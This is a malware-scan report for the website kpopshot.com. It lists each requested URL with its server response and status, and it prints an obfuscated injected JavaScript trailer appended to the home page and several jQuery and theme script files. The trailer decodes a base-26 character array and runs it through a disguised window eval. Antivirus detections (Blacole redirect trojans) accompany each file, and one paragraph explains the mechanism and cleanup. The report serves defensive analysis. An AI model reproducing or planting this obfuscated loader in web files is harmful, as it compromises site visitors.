Request | Server response | Status |
http://kpopshot.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 10 Jun 2014 22:13:34 GMT Location: http://www.kpopshot.com/ Server: Apache Vary: Accept-Encoding Content-Length: 232 Content-Type: text/html; charset=iso-8859-1
| clean |
http://www.kpopshot.com/ | 200 OK Content-Length: 30431 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["createElement"]("span");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["3o","4d","46","3l","4c","41","47","46","16","3p","4a","3j","1e","3j","1i","3k","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","3o","44","47","47","4a","1e","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1g","1e","3k","1j","3j","1h"
... 2384 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/Agent.axqoua
- Avast
- JS:Iframe-XL [Trj]
- Ikarus
- Exploit.JS.Blacole
- nProtect
- Trojan.JS.Clicker.ADU
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.Blacole.YA
- McAfee-GW-Edition
- JS/Blacole-Redirect.y
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- Trojan.JS.Clicker.ADU
- Fortinet
- JS/Crypt.BBEO!tr
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Blacole-Redirect.y
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- Trojan.JS.Clicker.ADU
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/Blacole.DB.gen
- AVG
- HTML/Framer
- Norman
- Clicker.OJ
- GData
- Trojan.JS.Clicker.ADU
- Commtouch
- JS/Blacole.DB.gen
- BitDefender
- Trojan.JS.Clicker.ADU
|
http://www.kpopshot.com/wp-content/themes/kpopshot/js/jquery-1.4.2.min.js | 200 OK Content-Length: 75784 Content-Type: application/javascript | malicious |
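Malicious code - confirmed by antiviruses (see below). The excerpt starts with what appears to be the original jQuery code; the flagged part is the obfuscated block appended at the end of the file, after the skipped bytes. That block decodes the `n` array with `String.fromCharCode(parseInt(n[i],26))` and passes the result to `ww["e"+vl]`, which resolves to `window.eval` (`ww=window`, `vl="val"`); the name is assembled from split strings, so a plain search for "eval" does not find it. The same trailer ends every script in this report and the home page itself, which suggests the files were modified on the server: search the web root for a fixed fragment such as `parseInt(n[i],26)`, restore each affected file from a known-good copy, and find out how write access to the site was obtained.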
(function(A,w){function ma(){if(!c.isReady){try{s.documentElement.doScroll("left")}catch(a){setTimeout(ma,1);return}c.ready()}}function Qa(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,j){var i=a.length;if(typeof b==="object"){for(var o in b)X(a,o,b[o],f,e,d);return a}if(d!==w){f=!j&&f&&c.isFunction(d);for(o=0;o<i;o++)e(a[o],b,f?d.cal
... 78533 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.CM
- Avast
- JS:Iframe-XL [Trj]
- Ikarus
- Trojan-Downloader.JS.Agent
- nProtect
- JS:Trojan.JS.Iframe.CT
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Emsisoft
- JS:Trojan.JS.Iframe.CT (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.CT
- Fortinet
- JS/Blacole.HT!exploit
- PCTools
- Malware.JS-Runfore
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- JS:Trojan.JS.Iframe.CT
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- AVG
- HTML/Framer
- GData
- JS:Trojan.JS.Iframe.CT
- Symantec
- JS.Runfore
- BitDefender
- JS:Trojan.JS.Iframe.CT
|
http://www.kpopshot.com/wp-content/themes/kpopshot/fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 19125 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
;(function(b){var m,t,u,f,D,j,E,n,z,A,q=0,e={},o=[],p=0,d={},l=[],G=null,v=new Image,J=/\.(jpg|gif|png|bmp|jpeg)(.*)?$/i,W=/[^\.]\.(swf)\s*$/i,K,L=1,y=0,s="",r,i,h=false,B=b.extend(b("<div/>")[0],{prop:0}),M=b.browser.msie&&b.browser.version<7&&!window.XMLHttpRequest,N=function(){t.hide();v.onerror=v.onload=null;G&&G.abort();m.empty()},O=function(){if(false===e.onError(o,q,e)){t.hide();h=false}else{e.titleShow=false;e.width="auto";e.height="auto";m.ht
... 18460 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.CM
- Avast
- JS:Iframe-XL [Trj]
- nProtect
- JS:Trojan.JS.Iframe.CT
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Emsisoft
- JS:Trojan.JS.Iframe.CT (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.CT
- Fortinet
- JS/Blacole.HT!exploit
- PCTools
- Malware.JS-Runfore
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- JS:Trojan.JS.Iframe.CT
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- AVG
- HTML/Framer
- Norman
- Blacole.QE
- GData
- JS:Trojan.JS.Iframe.CT
- Symantec
- JS.Runfore
- BitDefender
- JS:Trojan.JS.Iframe.CT
|
http://www.kpopshot.com/wp-content/themes/kpopshot/js/general.js | 200 OK Content-Length: 54256 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
(function($){
$.fn.pageSlide = function(options) {
var settings = $.extend({
width: "300px", duration: "normal", direction: "left", modal: false, _identifier: $(this)
}, options);
var pageslide_slide_wrap_css = {
position: 'fixed',
width: '0',
top: '0',
height: '100%',
zIndex:'999'
};
var pagesli
... 50652 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.CM
- Avast
- JS:Iframe-XL [Trj]
- nProtect
- JS:Trojan.JS.Iframe.CT
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Emsisoft
- JS:Trojan.JS.Iframe.CT (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- Fortinet
- JS/Blacole.HT!exploit
- PCTools
- Malware.JS-Runfore
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- JS:Trojan.JS.Iframe.CT
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- AVG
- HTML/Framer
- GData
- JS:Trojan.JS.Iframe.CT
- BitDefender
- JS:Trojan.JS.Iframe.CT
|
http://www.kpopshot.com/wp-content/themes/kpopshot/js/function.js | 200 OK Content-Length: 5805 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
$(document).ready(
function(){
$('#news').innerfade({
animationtype: 'slide',
speed: 750,
timeout: 2000,
type: 'random',
containerheight: '1em'
});
$('ul#portfolio').innerfade({
speed: 1000,
timeout: 5000,
type: 'sequence',
containerheight: '220px'
});
$('.fade').innerfade({
speed: 1000,
tim
... 4924 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.CM
- Avast
- JS:Iframe-XL [Trj]
- Ikarus
- Trojan-Downloader.JS.Agent
- nProtect
- JS:Trojan.JS.Iframe.CT
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Emsisoft
- JS:Trojan.JS.Iframe.CT (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.CT
- Fortinet
- JS/Blacole.HT!exploit
- PCTools
- Malware.JS-Runfore
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- JS:Trojan.JS.Iframe.CT
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- AVG
- HTML/Framer
- Norman
- Blacole.QE
- GData
- JS:Trojan.JS.Iframe.CT
- Symantec
- JS.Runfore
- BitDefender
- JS:Trojan.JS.Iframe.CT
|
http://www.kpopshot.com/wp-content/themes/kpopshot/js/filter.js | 200 OK Content-Length: 5066 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
(function($){
$.fn.shuffle = function() {
var allElems = this.get(),
getRandom = function(max) {
return Math.floor(Math.random() * max);
},
shuffled = $.map(allElems, function(){
allElems.splice(random, 1);
return randEl;
});
this.each(function(i){
$(this).replac
... 3906 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.CM
- Avast
- JS:Iframe-XL [Trj]
- Ikarus
- Trojan-Downloader.JS.Agent
- nProtect
- JS:Trojan.JS.Iframe.CT
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Emsisoft
- JS:Trojan.JS.Iframe.CT (B)
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- MicroWorld-eScan
- JS:Trojan.JS.Iframe.CT
- Fortinet
- JS/Blacole.HT!exploit
- PCTools
- Malware.JS-Runfore
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- F-Secure
- JS:Trojan.JS.Iframe.CT
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- AVG
- HTML/Framer
- Norman
- Blacole.QE
- GData
- JS:Trojan.JS.Iframe.CT
- Symantec
- JS.Runfore
- BitDefender
- JS:Trojan.JS.Iframe.CT
|
http://www.kpopshot.com/wp-content/themes/kpopshot/js/styleswitch.js | 200 OK Content-Length: 8043 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var manual_or_random="manual" var randomsetting="3 days"
function getCookie(Name) {
var re=new RegExp(Name+"=[^;]+", "i"); if (document.cookie.match(re)) return document.cookie.match(re)[0].split("=")[1] return null
}
function setCookie(name, value, days) {
var expireDate = new Date()
var expstring=(typeof days!="undefined")? expireDate.setDate(expireDate.getDate()+parseInt(days)) : expireDate.setDate(expireDate.getDate()-5)
document.cookie
... 5198 bytes are skipped ...1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-609!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],26));}z=s;vl="val";if(ww.document)ww["e"+vl](z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.CM
- Avast
- JS:Iframe-XL [Trj]
- Ikarus
- Trojan-Downloader.JS.Agent
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.Blacole.YA
- CAT-QuickHeal
- JS/BlacoleRef.CN
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- Trojan-Downloader.JS.Agent.gvn
- Microsoft
- Trojan:JS/BlacoleRef.CM
- Fortinet
- JS/Blacole.HT!exploit
- PCTools
- Malware.JS-Runfore
- Jiangmin
- Trojan/Script.Gen
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Blackhole.bekghp
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- AVG
- HTML/Framer
- Norman
- Blacole.QE
- GData
- JS:Iframe-XL
- Symantec
- JS.Runfore
|
http://kpopshot.com/test404page.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 10 Jun 2014 22:13:41 GMT Location: http://www.kpopshot.com/test404page.js Server: Apache Vary: Accept-Encoding Content-Length: 246 Content-Type: text/html; charset=iso-8859-1
| clean |
http://www.kpopshot.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |